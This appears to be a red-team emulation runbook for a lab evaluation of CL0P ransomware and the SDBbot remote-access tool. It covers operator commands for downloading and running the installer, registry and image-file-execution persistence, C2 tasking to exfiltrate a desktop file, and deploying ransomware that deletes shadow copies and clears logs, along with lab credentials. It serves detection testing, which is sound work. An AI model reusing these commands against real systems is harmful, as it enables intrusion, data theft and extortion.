# CL0P Scenario Overview

Legend of symbols:

  • 💡 - callout notes
  • - extremely important note
  • ➡️ - Switching to another session
  • - Disconnect from RDP
  • 🔴 - Sign out of RDP
  • 📷 - take a screenshot
  • 🕑 - Record timestamp

# Step 0 - Red Setup

# :biohazard: Procedures

  • Initiate an RDP session to the Kali attack host corsair (223.246.0.70):

    IP Username Password
    223.246.0.70 op1 Subpar-Parabola

  • In a new terminal window start the evalsC2server, ensuring the following handlers are enabled:

    • Simple File Server

    • SDBbot

      cd cl0p/Resources/control_server
sudo go build -o controlServer main.go
sudo ./controlServer -c config/cl0p.yml
      Password
      Subpar-Parabola

  • Right-click within the terminal window and click "Split Terminal Horizontally". Within the new terminal, change directory to the location of the evalsC2client.py and use this terminal for tasking implants.

    cd cl0p/Resources/control_server

  • ➡️ Initiate an RDP session to the Windows jumpbox spitfire (223.246.0.90)

# Step 0 - Range Setup

  • ➡️ From the Windows jumpbox spitfire (223.246.0.90), initiate an RDP session to the Windows victim workstation diagonalley (10.55.4.21) as encryptpotter.net\griphook:

    Hostname Username Password
    diagonalley.encryptpotter.net encryptpotter.net\griphook Feral-Studs

  • Search for Command Prompt and execute the following command.

curl -o C:\Users\griphook\AppData\Roaming\IFInstaller.dll  http://curse-breaker.org/files/installer.dll
  • Close the command prompt window.

# Step 1 - Persistence (Evaluation Step 5)

# 🎤 Voice Track

The victim executes the downloaded SDBbot Installer (C:\Users\griphook\AppData\Roaming\IFInstaller.dll) using rundll32.exe.

The SDBbot Installer contains an embedded RAT payload and, on execution, writes shellcode and the embedded payload as a binary blob to the registry at HKLM\SOFTWARE\Microsoft\skw. Then, the installer establishes persistence using image file execution options injection:

  • The SDBbot Installer saves the SDBbot Loader DLL to C:\Windows\temp\tmp8AB2.tmp and creates a symbolic link C:\Windows\System32\msverload.dll linking to the Loader DLL
  • The SDBbot Installer adds msverload.dll to the VerifierDlls value for winlogon.exe

# :biohazard: Procedures

  • In the RDP session to the Windows victim workstation diagonalley (10.55.4.21) as encryptpotter.net\griphook, search for Command Prompt and right-click to Run as Administrator.

  • In the Admin Command Prompt, execute the SDBbot Installer using rundll32:

    rundll32.exe C:\Users\griphook\AppData\Roaming\IFInstaller.dll,install

  • 📷 Confirm and screenshot that the payload was executed in Command Prompt.

# 🔍 Reference Code & Reporting

ℹ️ NOTE: Not all techniques listed in this table directly map to evaluation substeps

Red Team Activity Source Code Link ATT&CK Technique Relevant CTI Report
IFInstaller.dll is executed via rundll32.exe - T1218.011 System Binary Proxy Execution: Rundll32 -
IFInstaller.dll contains an embedded PE file Load and decrypt embedded shellcode T1027.009 Obfuscated Files or Information: Embedded Payloads Proofpoint - 2019
SDBbot Installer stores the loader shellcode and embedded PE file in HKLM\SOFTWARE\Microsoft\skw register_shellcode_transacted T1112 Modify Registry Proofpoint - 2019
IBM X-Force - 2020
SDBbot Installer installs persistence via image file executions options VerifierDLL verifier.cpp T1546.012 Event Triggered Execution: Image File Execution Options Injection Proofpoint - 2019

# Step 2 - Command and Control (Evaluation Step 6)

# 🎤 Voice Track

Eventually encryptpotter.net\griphook logs back in to diagonalley (10.55.4.21), executing the image file execution options persistence mechanism.

The SDBbot Loader component reads the binary blob stored in the registry and executes the shellcode. The shellcode will load and execute the SDBbot RAT payload in memory. The SDBbot RAT establishes C2 communication over TCP port 443 and sends discovery output (domain name, computer name, country code, OS version, user privileges, whether proxy is configured).

# :biohazard: Procedures

  • Return to your RDP session to diagonalley (10.55.4.21) as encryptpotter.net\griphook

  • Sign out of the RDP session and sign back in to diagonalley (10.55.4.21) as encryptpotter.net\griphook

    Hostname Username Password
    diagonalley.encryptpotter.net encryptpotter.net\griphook Feral-Studs

  • On the Desktop, open Inventory_gdlRyr.xls (opens in LibreOffice Calc)

  • ➡️ Return to the Kali attack host corsair (223.246.0.70)

  • 📷 Confirm and screenshot C2 registration of the SDBbot RAT

# 🔍 Reference Code & Reporting

ℹ️ NOTE: Not all techniques listed in this table directly map to evaluation substeps

Red Team Activity Source Code Link ATT&CK Technique Relevant CTI Report
Operating system loads SDBbot Loader into winlogon.exe T1546.012 Event Triggered Execution: Image File Execution Options Injection Proofpoint - 2019
SDBbot Loader reflectively loads the SDBbot RAT T1620 Reflective Code Loading Proofpoint - 2019
SDBbot RAT uses Windows APIs core.cpp T1106 Native API Proofpoint - 2019
IBM X-Force - 2020
SDBbot RAT discovers current process integrity via OpenProcessToken, GetCurrentProcess, and GetTokenInformation core.cpp T1057 Process Discovery Proofpoint - 2019
IBM X-Force - 2020
SDBbot RAT discovers domain name via gethostname and getaddrinfo core.cpp T1082 System Information Discovery Proofpoint - 2019
IBM X-Force - 2020
SDBbot RAT discovers computer name via GetComputerName core.cpp T1082 System Information Discovery Proofpoint - 2019
IBM X-Force - 2020
SDBbot RAT discovers username via GetUserNameA core.cpp T1033 System Owner/User Discovery Proofpoint - 2019
IBM X-Force - 2020
SDBbot RAT discovers country code via GetUserGeoID and GetGeoInfoW core.cpp T1082 System Information Discovery Proofpoint - 2019
IBM X-Force - 2020
SDBbot RAT discovers the Windows version via rtlGetVersion core.cpp T1082 System Information Discovery Proofpoint - 2019
IBM X-Force - 2020
SDBbot RAT connects to the C2 server over TCP port 443 comms.cpp T1095 Non-Application Layer Protocol Proofpoint - 2019
IBM X-Force - 2020

# Step 3 - Discovery and Exfiltration (Evaluation Step 7)

# 🎤 Voice Track

The attacker will then use SDBbot to discover and exfiltrate files of interest from the workstation.

# :biohazard: Procedures

  • Task the SDBbot RAT to enumerate a user directory before exfiltrating files

    ./evalsC2client.py --set-task 0x0000000F '{"id":"execute", "arg":"dir C:\\users\\"}'

  • Task the SDBbot RAT to exfiltrate files

    ./evalsC2client.py --set-task 0x0000000F '{"id":"read", "arg":"C:\\Users\\griphook\\Desktop\\Findings_reZGaJ.doc"}'

  • 📷 Confirm and screenshot the successful file download from the C2 server output.

# 🔍 Reference Code & Reporting

ℹ️ NOTE: Not all techniques listed in this table directly map to evaluation substeps

Red Team Activity Source Code Link ATT&CK Technique Relevant CTI Report
SDBbot RAT executes dir core.cpp T1083 File and Directory Discovery -
SDBbot RAT exfiltrates files core.cpp T1041 Exfiltration Over C2 Channel Cybereason - 2020

# Step 4 - Defense Evasion and Impact (Evaluation Step 8)

# 🎤 Voice Track

The attacker will then use SDBbot to ingress and execute the CL0P ransomware on diagonalley (10.55.4.21). On execution, CL0P will perform the following actions:

  • Discover the keyboard layout to check the language and retrieve the font used by the system
  • Delete shadow copies and resize shadow storage
  • Disable boot recovery options
  • Stop various services
  • Stop various processes
  • Enumerate logical drives and files
  • Suppress error dialogues and encrypt files using AES, appending the .C_I0p extension to encrypted files
  • Leave ransom notes in affected folders
  • Clear Windows Event Logs
  • Delete itself on completion

# :biohazard: Procedures

  • From the Kali attack host corsair (223.246.0.70), task the SDBbot RAT to ingress the CL0P executable

    ./evalsC2client.py --set-task 0x0000000F '{"id":"download", "payload":"main.exe", "arg":"C:\\Windows\\System32\\SysMonitor.exe"}'

  • Task the SDBbot RAT to execute CL0P

    ./evalsC2client.py --set-task 0x0000000F '{"id":"execute", "arg":"C:\\Windows\\System32\\SysMonitor.exe"}'

  • Allow 5-10 minutes for CL0P to finish running.

  • 📷 Screenshot the result of CL0P execution from the C2 server output.

# 🔍 Reference Code & Reporting

ℹ️ NOTE: Not all techniques listed in this table directly map to evaluation substeps

Red Team Activity Source Code Link ATT&CK Technique Relevant CTI Report
SDBbot RAT ingresses CL0P executable core.cpp T1105 Ingress Tool Transfer Palo Alto - 2021
SDBbot RAT executes CL0P executable core.cpp T1059.003 Command and Scripting Interpreter: Windows Command Shell Palo Alto - 2021
Proofpoint - 2019
Cybereason - 2020
CL0P checks keyboard layout via GetKeyboardLayout and GetTextCharset guardrails.cpp T1614.001: System Location Discovery: System Language Discovery McAfee - 2019
CL0P executes commands via cmd.exe /c core.cpp T1059.003 Command and Scripting Interpreter: Windows Command Shell Cybereason - 2020
CL0P deletes shadow copies and resizes shadow storage defense.cpp T1490 Inhibit System Recovery McAfee - 2019
Sectrio - 2023
CL0P disables boot recovery options defense.cpp T1490 Inhibit System Recovery McAfee - 2019
CL0P stops services defense.cpp T1489 Service Stop McAfee - 2019
CL0P stops processes via OpenProcess and TerminateProcess defense.cpp T1489 Service Stop McAfee - 2019
CL0P suppresses error dialogues via SetErrorMode defense.cpp T1562.006 Impair Defenses: Indicator Blocking McAfee - 2019
CL0P encrypts files using AES, appending the .C_I0p extension to encrypted files encryption.cpp T1486 Data Encrypted for Impact McAfee - 2019
Cybereason - 2020
CL0P leaves ransom notes to affected folders encryption.cpp T1491.001 Defacement: Internal Defacement Cybereason - 2020
McAfee - 2019
Palo Alto - 2021
Sectrio - 2023
CL0P clears Windows Event Logs defense.cpp T1070.001 Indicator Removal: Clear Windows Event Logs Sectrio - 2023
Trend Micro - 2022
CL0P deletes itself defense.cpp T1070.004 Indicator Removal: File Deletion McAfee - 2019
Sectrio - 2023

# 🔚 End of Execution